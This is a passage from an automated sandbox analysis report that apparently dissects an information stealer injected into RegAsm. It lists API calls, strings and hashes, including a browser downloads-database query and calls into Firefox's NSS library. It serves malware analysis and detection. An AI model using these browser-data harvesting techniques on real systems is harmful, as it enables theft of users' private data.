Part of subcall function 6C15E190: PR_ExitMonitor.NSS3 ref: 6C15E257

PR_ExitMonitor.NSS3(6C1680DD), ref: 6C15E5B5
PR_DestroyMonitor.NSS3 ref: 6C15E5C3

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: a28989fc3764da46d066d52bab3a47a6c793e5225dbb69bbedd343f9b848f1eb
Instruction ID: 2c666e057ff271cd1432be7c25c564930dc769fecf852295119da62e7f3daac9
Opcode Fuzzy Hash: a28989fc3764da46d066d52bab3a47a6c793e5225dbb69bbedd343f9b848f1eb
Instruction Fuzzy Hash: 1F0161F1E20280CBEE129F24DB0969137B4BB1224CF001026DD0581E91FB71B664DB9A

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,004136EC,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

%s%s, xrefs: 00412150
C:\Users\user\Desktop\, xrefs: 0041212C, 00412131

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-4107738187
Opcode ID: af8cf25ee3e4b455e0f5f0be2b9ca894240d552948477b868ac664422aa57f97
Instruction ID: 351c1eebac9366c9177d38625d3b8c39b4a5908a19005baa5ea9a819f4e49057
Opcode Fuzzy Hash: af8cf25ee3e4b455e0f5f0be2b9ca894240d552948477b868ac664422aa57f97
Instruction Fuzzy Hash: 16F0273220031A7FDB111F99DC48DABBFAEEF956AAF000025F908D7250C7B15D2187E9

Function 6C13AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C13AFDA

Strings

misuse, xrefs: 6C13AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C13AF5C
%s at line %d of [%.10s], xrefs: 6C13AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C13AFC4

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 659a9114418a64070b881fed656fa9a96860241ed85bc6e2008ffbe78653ee44
Instruction ID: 06934ace835c96ad08ceb63a7832cd7b46632b367cc682a1f9b10f4c35aad789
Opcode Fuzzy Hash: 659a9114418a64070b881fed656fa9a96860241ed85bc6e2008ffbe78653ee44
Instruction Fuzzy Hash: 7A91F475A052258FDF04CF99C894BAEB7F1BF45318F1954A8E869AB791D334EC01CBA0

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

v20, xrefs: 00408286
ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v10, xrefs: 004082CE

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: d06a5425e3d88fb40eba6ed48af870b4703ace664d3133fdc0e8db84651e1748
Instruction ID: 576cc88962dddac05d9328a6a662975c69cd500460e180845761462dab9f6f32
Opcode Fuzzy Hash: d06a5425e3d88fb40eba6ed48af870b4703ace664d3133fdc0e8db84651e1748
Instruction Fuzzy Hash: D041B3B2A00108ABCB10DFA5DD41ADE3BB8AB84714F15413BFD40F72C0EB7899458799

Function 6C0DE4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0DE53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0DE5BC

Strings

%s at line %d of [%.10s], xrefs: 6C0DE534, 6C0DE5B6
database corruption, xrefs: 6C0DE52F, 6C0DE5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DE525, 6C0DE596, 6C0DE5A7

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 5ee28beccbf3c6af83768e06675cfc0b6276481ae44f33dad13cbf5cec89bf3a
Instruction ID: 93f886c60dde7f8b373b752b9eb5f0d54b6f7b339a36c2dea0429a00810f5be1
Opcode Fuzzy Hash: 5ee28beccbf3c6af83768e06675cfc0b6276481ae44f33dad13cbf5cec89bf3a
Instruction Fuzzy Hash: C63149306407149BC311CE9DC890A7BF7E0EB46764B95097DE898A7B89F365F949C3D0

Function 6C1C6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C6E57

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6EAA

Strings

n&l, xrefs: 6C1C6DF9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: n&l
API String ID: 3163584228-653591135
Opcode ID: 3fc57e37e804d14d1d057f797b67458afcd4db186cfe017638bffc9996898fcc
Instruction ID: e8511371ac445a4cce8e31c4312497726b76002aa1072351c2c5af8f5cd45069
Opcode Fuzzy Hash: 3fc57e37e804d14d1d057f797b67458afcd4db186cfe017638bffc9996898fcc
Instruction Fuzzy Hash: 0E31D57171451AEFDB149F34CC043B6B7A4AB3131AF10063EE999D6A80EB39A854CF83

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBBA
Part of subcall function 0042EBA5: __CxxThrowException@8.LIBCMT ref: 0042EBCF
Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBE0

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: b5ee1e36cde483639cc3e6d95785c68bb65b62bed71106a51b8c0cde0970ccdb
Instruction ID: 6134a8c2deee62c053658d6195db54a66017ca9e390d67b15cf3165aa06d6131
Opcode Fuzzy Hash: b5ee1e36cde483639cc3e6d95785c68bb65b62bed71106a51b8c0cde0970ccdb
Instruction Fuzzy Hash: 4011EC71300201AFDB24EF2CE981A59B3A9BF45324754053AF816EBAC2C778ED498799

Function 6C140DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C140BDE), ref: 6C140DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C140BDE), ref: 6C140DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C140BDE), ref: 6C140DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C140BDE), ref: 6C140E32

Strings

%s incr => %d (find lib), xrefs: 6C140E2D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 57050e640494631d34ce60da6402193645a8991030d4a80933cea456e9419cd1
Instruction ID: 84b2c05bb94e8106dc2b7273b0ea4a6d18f7b260872617fd375638024a5b5945
Opcode Fuzzy Hash: 57050e640494631d34ce60da6402193645a8991030d4a80933cea456e9419cd1
Instruction Fuzzy Hash: 6E0128B17006249FE7108F269C49E1773ACDB55B09B05842DDD05E7A81E761FC14C7E1

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Strings

Downloads, xrefs: 004092D1
SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 00409328

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 9b3696f59d4359cf1a3037773c32cdea8040557d144572830c50b49bcea24296
Instruction ID: 36d08597fe9a32593412ec2ec059bd41026efbce4f2b5eff2c0e9a5acdc0c116
Opcode Fuzzy Hash: 9b3696f59d4359cf1a3037773c32cdea8040557d144572830c50b49bcea24296
Instruction Fuzzy Hash: 98712171A401199BCF11FBA5DE464DD7375AF04309F511036F500B70E1DBB8AE898B99

Function 6C19C590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C19C5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C19C603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C19C636
PK11_FreeSymKey.NSS3(?), ref: 6C19C6D7
PK11_FreeSymKey.NSS3(?), ref: 6C19C6E1

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: a251614246e52aef7893e5a0ef619381e88398232442c067bcf1c3de93e4dc66
Instruction ID: 231ec9b60ce608517f783657d6df806f69319ed99b0942cf20ab590be62f7339
Opcode Fuzzy Hash: a251614246e52aef7893e5a0ef619381e88398232442c067bcf1c3de93e4dc66
Instruction Fuzzy Hash: 664187B560120AAFDB019F69DC91EAB77A9EF18348B400038FD49D7711E731DD26CBA1

Function 6C1E2460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C287379,00000002,?), ref: 6C1E2493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C1E24B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C287379,00000002,?), ref: 6C1E24EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C287379,00000002,?), ref: 6C1E24F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C287379,00000002,?), ref: 6C1E24FE

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: b0dac7649cf91625e92c65f4fbd58b3047edb1bc72450a8ce9fed751124b42d8
Instruction ID: ebb758b9074f492935a49724f4086d3122dc04ec3863570bae453b5329a9cbdf
Opcode Fuzzy Hash: b0dac7649cf91625e92c65f4fbd58b3047edb1bc72450a8ce9fed751124b42d8
Instruction Fuzzy Hash: 6B31F3B1A00517AFEB008FA5DC59BBFB7A4EF58308F108125FD15D6690E734D859C7A1

Function 6C1E8530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C1E8549
TlsGetValue.KERNEL32 ref: 6C1E85CF
TlsGetValue.KERNEL32 ref: 6C1E85FE
TlsGetValue.KERNEL32 ref: 6C1E8629
memcpy.VCRUNTIME140 ref: 6C1E8655

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: a537f6ef0be1b815b4cad4dd8add67212e78bc722305553d603b27802bcf9359
Instruction ID: 4d6ded65c562958fd55884ed8c251796cad65279f346639e25c9cd4e243f6d92
Opcode Fuzzy Hash: a537f6ef0be1b815b4cad4dd8add67212e78bc722305553d603b27802bcf9359
Instruction Fuzzy Hash: 9A419EB0605B01CBFB009F6DC54876AB7B0BF5D308F11866ADC9887A91EB349496CB82

Function 6C14EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C14EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C14EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C14EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C14EEEB
free.MOZGLUE(?), ref: 6C14EEF6

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 13b0a64dc3b9c2d6e9a3424ea2e00603c03b7eefae3c05a8769e819fc05c17fc
Instruction ID: 4bd13f345423cc8fe1a73a21af32030b6c993ba4706562d7abef755d2c2412bb
Opcode Fuzzy Hash: 13b0a64dc3b9c2d6e9a3424ea2e00603c03b7eefae3c05a8769e819fc05c17fc
Instruction Fuzzy Hash: E63106B16002019BD720DF2DCC48B66BBB4FF55308F044528ED5A97A91EB31E614CBE1

Function 6C26A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C26A55C
PR_IntervalNow.NSS3 ref: 6C26A573
PR_IntervalNow.NSS3 ref: 6C26A5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6C26A603

Part of subcall function 6C219890: TlsGetValue.KERNEL32(?,?,?,6C2197EB), ref: 6C21989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C26A636

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: 3615d6b386a28d4ac0e2b3248271cea605630436203bf22597f1cf8ec8639184
Instruction ID: 240bd5b9fbe8ee3b2ee4973f89ffd147c4bf9607927ab2a452c85d4b0c78619d
Opcode Fuzzy Hash: 3615d6b386a28d4ac0e2b3248271cea605630436203bf22597f1cf8ec8639184
Instruction Fuzzy Hash: 6E313DB1A0061ACFCB00DF2AC484A5ABBE5FF85319B158565DD159BF16E730E8C5CBA0

Function 6C1544D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C1544FF

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
